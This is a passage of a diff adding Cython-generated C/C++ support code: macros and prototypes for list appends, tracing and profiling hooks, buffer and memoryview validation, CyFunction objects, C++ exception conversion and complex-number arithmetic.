PyErr_GivenExceptionMatches(err, type) +#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) +#endif +#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) +#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) + +CYTHON_UNUSED static int __pyx_memoryview_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +/* ListCompAppend.proto */ +#if CYTHON_USE_PYLIST_INTERNALS && CYTHON_ASSUME_SAFE_MACROS +static CYTHON_INLINE int __Pyx_ListComp_Append(PyObject* list, PyObject* x) { + PyListObject* L = (PyListObject*) list; + Py_ssize_t len = Py_SIZE(list); + if (likely(L->allocated > len)) { + Py_INCREF(x); + PyList_SET_ITEM(list, len, x); + __Pyx_SET_SIZE(list, len + 1); + return 0; + } + return PyList_Append(list, x); +} +#else +#define __Pyx_ListComp_Append(L,x) PyList_Append(L,x) +#endif + +/* PySequenceMultiply.proto */ +#define __Pyx_PySequence_Multiply_Left(mul, seq) __Pyx_PySequence_Multiply(seq, mul) +static CYTHON_INLINE PyObject* __Pyx_PySequence_Multiply(PyObject *seq, Py_ssize_t mul); + +/* SetItemInt.proto */ +#define __Pyx_SetItemInt(o, i, v, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_SetItemInt_Fast(o, (Py_ssize_t)i, v, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list assignment index out of range"), -1) :\ + __Pyx_SetItemInt_Generic(o, to_py_func(i), v))) +static int __Pyx_SetItemInt_Generic(PyObject *o, PyObject *j, PyObject *v); +static CYTHON_INLINE int __Pyx_SetItemInt_Fast(PyObject *o, Py_ssize_t i, PyObject *v, + int is_list, int wraparound, int boundscheck); + +/* RaiseUnboundLocalError.proto */ +static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname); + +/* DivInt[long].proto */ +static CYTHON_INLINE long __Pyx_div_long(long, long); + +/* PySequenceContains.proto */ +static CYTHON_INLINE int __Pyx_PySequence_ContainsTF(PyObject* item, PyObject* seq, int eq) { + int result = PySequence_Contains(seq, item); + return unlikely(result < 0) ? result : (result == (eq == Py_EQ)); +} + +/* ImportFrom.proto */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name); + +/* HasAttr.proto */ +static CYTHON_INLINE int __Pyx_HasAttr(PyObject *, PyObject *); + +/* ListAppend.proto */ +#if CYTHON_USE_PYLIST_INTERNALS && CYTHON_ASSUME_SAFE_MACROS +static CYTHON_INLINE int __Pyx_PyList_Append(PyObject* list, PyObject* x) { + PyListObject* L = (PyListObject*) list; + Py_ssize_t len = Py_SIZE(list); + if (likely(L->allocated > len) & likely(len > (L->allocated >> 1))) { + Py_INCREF(x); + PyList_SET_ITEM(list, len, x); + __Pyx_SET_SIZE(list, len + 1); + return 0; + } + return PyList_Append(list, x); +} +#else +#define __Pyx_PyList_Append(L,x) PyList_Append(L,x) +#endif + +/* StringJoin.proto */ +#if PY_MAJOR_VERSION < 3 +#define __Pyx_PyString_Join __Pyx_PyBytes_Join +#define __Pyx_PyBaseString_Join(s, v) (PyUnicode_CheckExact(s) ? PyUnicode_Join(s, v) : __Pyx_PyBytes_Join(s, v)) +#else +#define __Pyx_PyString_Join PyUnicode_Join +#define __Pyx_PyBaseString_Join PyUnicode_Join +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #if PY_MAJOR_VERSION < 3 + #define __Pyx_PyBytes_Join _PyString_Join + #else + #define __Pyx_PyBytes_Join _PyBytes_Join + #endif +#else +static CYTHON_INLINE PyObject* __Pyx_PyBytes_Join(PyObject* sep, PyObject* values); +#endif + +/* CIntToPyUnicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_size_t(size_t value, Py_ssize_t width, char padding_char, char format_char); + +/* Profile.proto */ +#ifndef CYTHON_PROFILE +#if CYTHON_COMPILING_IN_LIMITED_API || CYTHON_COMPILING_IN_PYPY + #define CYTHON_PROFILE 0 +#else + #define CYTHON_PROFILE 1 +#endif +#endif +#ifndef CYTHON_TRACE_NOGIL + #define CYTHON_TRACE_NOGIL 0 +#else + #if CYTHON_TRACE_NOGIL && !defined(CYTHON_TRACE) + #define CYTHON_TRACE 1 + #endif +#endif +#ifndef CYTHON_TRACE + #define CYTHON_TRACE 0 +#endif +#if CYTHON_TRACE + #undef CYTHON_PROFILE_REUSE_FRAME +#endif +#ifndef CYTHON_PROFILE_REUSE_FRAME + #define CYTHON_PROFILE_REUSE_FRAME 0 +#endif +#if CYTHON_PROFILE || CYTHON_TRACE + #include "compile.h" + #include "frameobject.h" + #include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif + #if CYTHON_PROFILE_REUSE_FRAME + #define CYTHON_FRAME_MODIFIER static + #define CYTHON_FRAME_DEL(frame) + #else + #define CYTHON_FRAME_MODIFIER + #define CYTHON_FRAME_DEL(frame) Py_CLEAR(frame) + #endif + #define __Pyx_TraceDeclarations\ + static PyCodeObject *__pyx_frame_code = NULL;\ + CYTHON_FRAME_MODIFIER PyFrameObject *__pyx_frame = NULL;\ + int __Pyx_use_tracing = 0; + #define __Pyx_TraceFrameInit(codeobj)\ + if (codeobj) __pyx_frame_code = (PyCodeObject*) codeobj; +#if PY_VERSION_HEX >= 0x030b00a2 + #if PY_VERSION_HEX >= 0x030C00b1 + #define __Pyx_IsTracing(tstate, check_tracing, check_funcs)\ + ((!(check_tracing) || !(tstate)->tracing) &&\ + (!(check_funcs) || (tstate)->c_profilefunc || (CYTHON_TRACE && (tstate)->c_tracefunc))) + #else + #define __Pyx_IsTracing(tstate, check_tracing, check_funcs)\ + (unlikely((tstate)->cframe->use_tracing) &&\ + (!(check_tracing) || !(tstate)->tracing) &&\ + (!(check_funcs) || (tstate)->c_profilefunc || (CYTHON_TRACE && (tstate)->c_tracefunc))) + #endif + #define __Pyx_EnterTracing(tstate) PyThreadState_EnterTracing(tstate) + #define __Pyx_LeaveTracing(tstate) PyThreadState_LeaveTracing(tstate) +#elif PY_VERSION_HEX >= 0x030a00b1 + #define __Pyx_IsTracing(tstate, check_tracing, check_funcs)\ + (unlikely((tstate)->cframe->use_tracing) &&\ + (!(check_tracing) || !(tstate)->tracing) &&\ + (!(check_funcs) || (tstate)->c_profilefunc || (CYTHON_TRACE && (tstate)->c_tracefunc))) + #define __Pyx_EnterTracing(tstate)\ + do { tstate->tracing++; tstate->cframe->use_tracing = 0; } while (0) + #define __Pyx_LeaveTracing(tstate)\ + do {\ + tstate->tracing--;\ + tstate->cframe->use_tracing = ((CYTHON_TRACE && tstate->c_tracefunc != NULL)\ + || tstate->c_profilefunc != NULL);\ + } while (0) +#else + #define __Pyx_IsTracing(tstate, check_tracing, check_funcs)\ + (unlikely((tstate)->use_tracing) &&\ + (!(check_tracing) || !(tstate)->tracing) &&\ + (!(check_funcs) || (tstate)->c_profilefunc || (CYTHON_TRACE && (tstate)->c_tracefunc))) + #define __Pyx_EnterTracing(tstate)\ + do { tstate->tracing++; tstate->use_tracing = 0; } while (0) + #define __Pyx_LeaveTracing(tstate)\ + do {\ + tstate->tracing--;\ + tstate->use_tracing = ((CYTHON_TRACE && tstate->c_tracefunc != NULL)\ + || tstate->c_profilefunc != NULL);\ + } while (0) +#endif + #ifdef WITH_THREAD + #define __Pyx_TraceCall(funcname, srcfile, firstlineno, nogil, goto_error)\ + if (nogil) {\ + if (CYTHON_TRACE_NOGIL) {\ + PyThreadState *tstate;\ + PyGILState_STATE state = PyGILState_Ensure();\ + tstate = __Pyx_PyThreadState_Current;\ + if (__Pyx_IsTracing(tstate, 1, 1)) {\ + __Pyx_use_tracing = __Pyx_TraceSetupAndCall(&__pyx_frame_code, &__pyx_frame, tstate, funcname, srcfile, firstlineno);\ + }\ + PyGILState_Release(state);\ + if (unlikely(__Pyx_use_tracing < 0)) goto_error;\ + }\ + } else {\ + PyThreadState* tstate = PyThreadState_GET();\ + if (__Pyx_IsTracing(tstate, 1, 1)) {\ + __Pyx_use_tracing = __Pyx_TraceSetupAndCall(&__pyx_frame_code, &__pyx_frame, tstate, funcname, srcfile, firstlineno);\ + if (unlikely(__Pyx_use_tracing < 0)) goto_error;\ + }\ + } + #else + #define __Pyx_TraceCall(funcname, srcfile, firstlineno, nogil, goto_error)\ + { PyThreadState* tstate = PyThreadState_GET();\ + if (__Pyx_IsTracing(tstate, 1, 1)) {\ + __Pyx_use_tracing = __Pyx_TraceSetupAndCall(&__pyx_frame_code, &__pyx_frame, tstate, funcname, srcfile, firstlineno);\ + if (unlikely(__Pyx_use_tracing < 0)) goto_error;\ + }\ + } + #endif + #define __Pyx_TraceException()\ + if (likely(!__Pyx_use_tracing)); else {\ + PyThreadState* tstate = __Pyx_PyThreadState_Current;\ + if (__Pyx_IsTracing(tstate, 0, 1)) {\ + __Pyx_EnterTracing(tstate);\ + PyObject *exc_info = __Pyx_GetExceptionTuple(tstate);\ + if (exc_info) {\ + if (CYTHON_TRACE && tstate->c_tracefunc)\ + tstate->c_tracefunc(\ + tstate->c_traceobj, __pyx_frame, PyTrace_EXCEPTION, exc_info);\ + tstate->c_profilefunc(\ + tstate->c_profileobj, __pyx_frame, PyTrace_EXCEPTION, exc_info);\ + Py_DECREF(exc_info);\ + }\ + __Pyx_LeaveTracing(tstate);\ + }\ + } + static void __Pyx_call_return_trace_func(PyThreadState *tstate, PyFrameObject *frame, PyObject *result) { + PyObject *type, *value, *traceback; + __Pyx_ErrFetchInState(tstate, &type, &value, &traceback); + __Pyx_EnterTracing(tstate); + if (CYTHON_TRACE && tstate->c_tracefunc) + tstate->c_tracefunc(tstate->c_traceobj, frame, PyTrace_RETURN, result); + if (tstate->c_profilefunc) + tstate->c_profilefunc(tstate->c_profileobj, frame, PyTrace_RETURN, result); + CYTHON_FRAME_DEL(frame); + __Pyx_LeaveTracing(tstate); + __Pyx_ErrRestoreInState(tstate, type, value, traceback); + } + #ifdef WITH_THREAD + #define __Pyx_TraceReturn(result, nogil)\ + if (likely(!__Pyx_use_tracing)); else {\ + if (nogil) {\ + if (CYTHON_TRACE_NOGIL) {\ + PyThreadState *tstate;\ + PyGILState_STATE state = PyGILState_Ensure();\ + tstate = __Pyx_PyThreadState_Current;\ + if (__Pyx_IsTracing(tstate, 0, 0)) {\ + __Pyx_call_return_trace_func(tstate, __pyx_frame, (PyObject*)result);\ + }\ + PyGILState_Release(state);\ + }\ + } else {\ + PyThreadState* tstate = __Pyx_PyThreadState_Current;\ + if (__Pyx_IsTracing(tstate, 0, 0)) {\ + __Pyx_call_return_trace_func(tstate, __pyx_frame, (PyObject*)result);\ + }\ + }\ + } + #else + #define __Pyx_TraceReturn(result, nogil)\ + if (likely(!__Pyx_use_tracing)); else {\ + PyThreadState* tstate = __Pyx_PyThreadState_Current;\ + if (__Pyx_IsTracing(tstate, 0, 0)) {\ + __Pyx_call_return_trace_func(tstate, __pyx_frame, (PyObject*)result);\ + }\ + } + #endif + static PyCodeObject *__Pyx_createFrameCodeObject(const char *funcname, const char *srcfile, int firstlineno); + static int __Pyx_TraceSetupAndCall(PyCodeObject** code, PyFrameObject** frame, PyThreadState* tstate, const char *funcname, const char *srcfile, int firstlineno); +#else + #define __Pyx_TraceDeclarations + #define __Pyx_TraceFrameInit(codeobj) + #define __Pyx_TraceCall(funcname, srcfile, firstlineno, nogil, goto_error) if ((1)); else goto_error; + #define __Pyx_TraceException() + #define __Pyx_TraceReturn(result, nogil) +#endif +#if CYTHON_TRACE + static int __Pyx_call_line_trace_func(PyThreadState *tstate, PyFrameObject *frame, int lineno) { + int ret; + PyObject *type, *value, *traceback; + __Pyx_ErrFetchInState(tstate, &type, &value, &traceback); + __Pyx_PyFrame_SetLineNumber(frame, lineno); + __Pyx_EnterTracing(tstate); + ret = tstate->c_tracefunc(tstate->c_traceobj, frame, PyTrace_LINE, NULL); + __Pyx_LeaveTracing(tstate); + if (likely(!ret)) { + __Pyx_ErrRestoreInState(tstate, type, value, traceback); + } else { + Py_XDECREF(type); + Py_XDECREF(value); + Py_XDECREF(traceback); + } + return ret; + } + #ifdef WITH_THREAD + #define __Pyx_TraceLine(lineno, nogil, goto_error)\ + if (likely(!__Pyx_use_tracing)); else {\ + if (nogil) {\ + if (CYTHON_TRACE_NOGIL) {\ + int ret = 0;\ + PyThreadState *tstate;\ + PyGILState_STATE state = __Pyx_PyGILState_Ensure();\ + tstate = __Pyx_PyThreadState_Current;\ + if (__Pyx_IsTracing(tstate, 0, 0) && tstate->c_tracefunc && __pyx_frame->f_trace) {\ + ret = __Pyx_call_line_trace_func(tstate, __pyx_frame, lineno);\ + }\ + __Pyx_PyGILState_Release(state);\ + if (unlikely(ret)) goto_error;\ + }\ + } else {\ + PyThreadState* tstate = __Pyx_PyThreadState_Current;\ + if (__Pyx_IsTracing(tstate, 0, 0) && tstate->c_tracefunc && __pyx_frame->f_trace) {\ + int ret = __Pyx_call_line_trace_func(tstate, __pyx_frame, lineno);\ + if (unlikely(ret)) goto_error;\ + }\ + }\ + } + #else + #define __Pyx_TraceLine(lineno, nogil, goto_error)\ + if (likely(!__Pyx_use_tracing)); else {\ + PyThreadState* tstate = __Pyx_PyThreadState_Current;\ + if (__Pyx_IsTracing(tstate, 0, 0) && tstate->c_tracefunc && __pyx_frame->f_trace) {\ + int ret = __Pyx_call_line_trace_func(tstate, __pyx_frame, lineno);\ + if (unlikely(ret)) goto_error;\ + }\ + } + #endif +#else + #define __Pyx_TraceLine(lineno, nogil, goto_error) if ((1)); else goto_error; +#endif + +/* IsLittleEndian.proto */ +static CYTHON_INLINE int __Pyx_Is_Little_Endian(void); + +/* BufferFormatCheck.proto */ +static const char* __Pyx_BufFmt_CheckString(__Pyx_BufFmt_Context* ctx, const char* ts); +static void __Pyx_BufFmt_Init(__Pyx_BufFmt_Context* ctx, + __Pyx_BufFmt_StackElem* stack, + __Pyx_TypeInfo* type); + +/* BufferGetAndValidate.proto */ +#define __Pyx_GetBufferAndValidate(buf, obj, dtype, flags, nd, cast, stack)\ + ((obj == Py_None || obj == NULL) ?\ + (__Pyx_ZeroBuffer(buf), 0) :\ + __Pyx__GetBufferAndValidate(buf, obj, dtype, flags, nd, cast, stack)) +static int __Pyx__GetBufferAndValidate(Py_buffer* buf, PyObject* obj, + __Pyx_TypeInfo* dtype, int flags, int nd, int cast, __Pyx_BufFmt_StackElem* stack); +static void __Pyx_ZeroBuffer(Py_buffer* buf); +static CYTHON_INLINE void __Pyx_SafeReleaseBuffer(Py_buffer* info); +static Py_ssize_t __Pyx_minusones[] = { -1, -1, -1, -1, -1, -1, -1, -1 }; +static Py_ssize_t __Pyx_zeros[] = { 0, 0, 0, 0, 0, 0, 0, 0 }; + +/* MoveIfSupported.proto */ +#if __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600) + #include + #define __PYX_STD_MOVE_IF_SUPPORTED(x) std::move(x) +#else + #define __PYX_STD_MOVE_IF_SUPPORTED(x) x +#endif + +/* BufferFallbackError.proto */ +static void __Pyx_RaiseBufferFallbackError(void); + +/* PyObjectCallNoArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func); + +/* WriteUnraisableException.proto */ +static void __Pyx_WriteUnraisable(const char *name, int clineno, + int lineno, const char *filename, + int full_traceback, int nogil); + +/* PyObject_GenericGetAttrNoDict.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttrNoDict PyObject_GenericGetAttr +#endif + +/* PyObject_GenericGetAttr.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttr PyObject_GenericGetAttr +#endif + +/* IncludeStructmemberH.proto */ +#include + +/* FixUpExtensionType.proto */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); +#endif + +/* PyObjectGetMethod.proto */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method); + +/* PyObjectCallMethod0.proto */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name); + +/* ValidateBasesTuple.proto */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases); +#endif + +/* PyType_Ready.proto */ +CYTHON_UNUSED static int __Pyx_PyType_Ready(PyTypeObject *t); + +/* SetupReduce.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce(PyObject* type_obj); +#endif + +/* SetVTable.proto */ +static int __Pyx_SetVtable(PyTypeObject* typeptr , void* vtable); + +/* GetVTable.proto */ +static void* __Pyx_GetVtable(PyTypeObject *type); + +/* MergeVTables.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_MergeVtables(PyTypeObject *type); +#endif + +/* TypeImport.proto */ +#ifndef __PYX_HAVE_RT_ImportType_proto_3_0_0 +#define __PYX_HAVE_RT_ImportType_proto_3_0_0 +#if defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L +#include +#endif +#if (defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L) || __cplusplus >= 201103L +#define __PYX_GET_STRUCT_ALIGNMENT_3_0_0(s) alignof(s) +#else +#define __PYX_GET_STRUCT_ALIGNMENT_3_0_0(s) sizeof(void*) +#endif +enum __Pyx_ImportType_CheckSize_3_0_0 { + __Pyx_ImportType_CheckSize_Error_3_0_0 = 0, + __Pyx_ImportType_CheckSize_Warn_3_0_0 = 1, + __Pyx_ImportType_CheckSize_Ignore_3_0_0 = 2 +}; +static PyTypeObject *__Pyx_ImportType_3_0_0(PyObject* module, const char *module_name, const char *class_name, size_t size, size_t alignment, enum __Pyx_ImportType_CheckSize_3_0_0 check_size); +#endif + +/* FetchSharedCythonModule.proto */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void); + +/* FetchCommonType.proto */ +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); +#else +static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); +#endif + +/* PyMethodNew.proto */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { + CYTHON_UNUSED_VAR(typ); + if (!self) + return __Pyx_NewRef(func); + return PyMethod_New(func, self); +} +#else + #define __Pyx_PyMethod_New PyMethod_New +#endif + +/* PyVectorcallFastCallDict.proto */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); +#endif + +/* CythonFunctionShared.proto */ +#define __Pyx_CyFunction_USED +#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 +#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 +#define __Pyx_CYFUNCTION_CCLASS 0x04 +#define __Pyx_CYFUNCTION_COROUTINE 0x08 +#define __Pyx_CyFunction_GetClosure(f)\ + (((__pyx_CyFunctionObject *) (f))->func_closure) +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_CyFunction_GetClassObj(f)\ + (((__pyx_CyFunctionObject *) (f))->func_classobj) +#else + #define __Pyx_CyFunction_GetClassObj(f)\ + ((PyObject*) ((PyCMethodObject *) (f))->mm_class) +#endif +#define __Pyx_CyFunction_SetClassObj(f, classobj)\ + __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) +#define __Pyx_CyFunction_Defaults(type, f)\ + ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) +#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ + ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) +typedef struct { +#if PY_VERSION_HEX < 0x030900B1 + PyCFunctionObject func; +#else + PyCMethodObject func; +#endif +#if CYTHON_BACKPORT_VECTORCALL + __pyx_vectorcallfunc func_vectorcall; +#endif +#if PY_VERSION_HEX < 0x030500A0 + PyObject *func_weakreflist; +#endif + PyObject *func_dict; + PyObject *func_name; + PyObject *func_qualname; + PyObject *func_doc; + PyObject *func_globals; + PyObject *func_code; + PyObject *func_closure; +#if PY_VERSION_HEX < 0x030900B1 + PyObject *func_classobj; +#endif + void *defaults; + int defaults_pyobjects; + size_t defaults_size; // used by FusedFunction for copying defaults + int flags; + PyObject *defaults_tuple; + PyObject *defaults_kwdict; + PyObject *(*defaults_getter)(PyObject *); + PyObject *func_annotations; + PyObject *func_is_coroutine; +} __pyx_CyFunctionObject; +#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) +#define __Pyx_IsCyOrPyCFunction(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) +#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, + size_t size, + int pyobjects); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, + PyObject *tuple); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, + PyObject *dict); +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, + PyObject *dict); +static int __pyx_CyFunction_init(PyObject *module); +#if CYTHON_METH_FASTCALL +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +#if CYTHON_BACKPORT_VECTORCALL +#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) +#else +#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) +#endif +#endif + +/* CythonFunction.proto */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); + +/* CLineInTraceback.proto */ +#ifdef CYTHON_CLINE_IN_TRACEBACK +#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) +#else +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); +#endif + +/* CodeObjectCache.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +typedef struct { + PyCodeObject* code_object; + int code_line; +} __Pyx_CodeObjectCacheEntry; +struct __Pyx_CodeObjectCache { + int count; + int max_count; + __Pyx_CodeObjectCacheEntry* entries; +}; +static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); +static PyCodeObject *__pyx_find_code_object(int code_line); +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); +#endif + +/* AddTraceback.proto */ +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename); + +#if PY_MAJOR_VERSION < 3 + static int __Pyx_GetBuffer(PyObject *obj, Py_buffer *view, int flags); + static void __Pyx_ReleaseBuffer(Py_buffer *view); +#else + #define __Pyx_GetBuffer PyObject_GetBuffer + #define __Pyx_ReleaseBuffer PyBuffer_Release +#endif + + +/* BufferStructDeclare.proto */ +typedef struct { + Py_ssize_t shape, strides, suboffsets; +} __Pyx_Buf_DimInfo; +typedef struct { + size_t refcount; + Py_buffer pybuffer; +} __Pyx_Buffer; +typedef struct { + __Pyx_Buffer *rcbuffer; + char *data; + __Pyx_Buf_DimInfo diminfo[8]; +} __Pyx_LocalBuf_ND; + +/* MemviewSliceIsContig.proto */ +static int __pyx_memviewslice_is_contig(const __Pyx_memviewslice mvs, char order, int ndim); + +/* OverlappingSlices.proto */ +static int __pyx_slices_overlap(__Pyx_memviewslice *slice1, + __Pyx_memviewslice *slice2, + int ndim, size_t itemsize); + +/* TypeInfoCompare.proto */ +static int __pyx_typeinfo_cmp(__Pyx_TypeInfo *a, __Pyx_TypeInfo *b); + +/* MemviewSliceValidateAndInit.proto */ +static int __Pyx_ValidateAndInit_memviewslice( + int *axes_specs, + int c_or_f_flag, + int buf_flags, + int ndim, + __Pyx_TypeInfo *dtype, + __Pyx_BufFmt_StackElem stack[], + __Pyx_memviewslice *memviewslice, + PyObject *original_obj); + +/* ObjectToMemviewSlice.proto */ +static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_dsds_double(PyObject *, int writable_flag); + +/* MemviewDtypeToObject.proto */ +static CYTHON_INLINE PyObject *__pyx_memview_get_double(const char *itemp); +static CYTHON_INLINE int __pyx_memview_set_double(const char *itemp, PyObject *obj); + +/* ObjectToMemviewSlice.proto */ +static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_ds_double(PyObject *, int writable_flag); + +/* CppExceptionConversion.proto */ +#ifndef __Pyx_CppExn2PyErr +#include +#include +#include +#include +static void __Pyx_CppExn2PyErr() { + try { + if (PyErr_Occurred()) + ; // let the latest Python exn pass through and ignore the current one + else + throw; + } catch (const std::bad_alloc& exn) { + PyErr_SetString(PyExc_MemoryError, exn.what()); + } catch (const std::bad_cast& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::bad_typeid& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::domain_error& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::invalid_argument& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::ios_base::failure& exn) { + PyErr_SetString(PyExc_IOError, exn.what()); + } catch (const std::out_of_range& exn) { + PyErr_SetString(PyExc_IndexError, exn.what()); + } catch (const std::overflow_error& exn) { + PyErr_SetString(PyExc_OverflowError, exn.what()); + } catch (const std::range_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::underflow_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::exception& exn) { + PyErr_SetString(PyExc_RuntimeError, exn.what()); + } + catch (...) + { + PyErr_SetString(PyExc_RuntimeError, "Unknown exception"); + } +} +#endif + +/* RealImag.proto */ +#if CYTHON_CCOMPLEX + #ifdef __cplusplus + #define __Pyx_CREAL(z) ((z).real()) + #define __Pyx_CIMAG(z) ((z).imag()) + #else + #define __Pyx_CREAL(z) (__real__(z)) + #define __Pyx_CIMAG(z) (__imag__(z)) + #endif +#else + #define __Pyx_CREAL(z) ((z).real) + #define __Pyx_CIMAG(z) ((z).imag) +#endif +#if defined(__cplusplus) && CYTHON_CCOMPLEX\ + && (defined(_WIN32) || defined(__clang__) || (defined(__GNUC__) && (__GNUC__ >= 5 || __GNUC__ == 4 && __GNUC_MINOR__ >= 4 )) || __cplusplus >= 201103) + #define __Pyx_SET_CREAL(z,x) ((z).real(x)) + #define __Pyx_SET_CIMAG(z,y) ((z).imag(y)) +#else + #define __Pyx_SET_CREAL(z,x) __Pyx_CREAL(z) = (x) + #define __Pyx_SET_CIMAG(z,y) __Pyx_CIMAG(z) = (y) +#endif + +/* Arithmetic.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #define __Pyx_c_eq_float(a, b) ((a)==(b)) + #define __Pyx_c_sum_float(a, b) ((a)+(b)) + #define __Pyx_c_diff_float(a, b) ((a)-(b)) + #define __Pyx_c_prod_float(a, b) ((a)*(b)) + #define __Pyx_c_quot_float(a, b) ((a)/(b)) + #define __Pyx_c_neg_float(a) (-(a)) + #ifdef __cplusplus + #define __Pyx_c_is_zero_float(z) ((z)==(float)0) + #define __Pyx_c_conj_float(z) (::std::conj(z)) + #if 1 + #define __Pyx_c_abs_float(z) (::std::abs(z)) + #define __Pyx_c_pow_float(a, b) (::std::pow(a, b)) + #endif + #else + #define __Pyx_c_is_zero_float(z) ((z)==0) + #define __Pyx_c_conj_float(z) (conjf(z)) + #if 1 + #define __Pyx_c_abs_float(z) (cabsf(z)) + #define __Pyx_c_pow_float(a, b) (cpowf(a, b)) + #endif 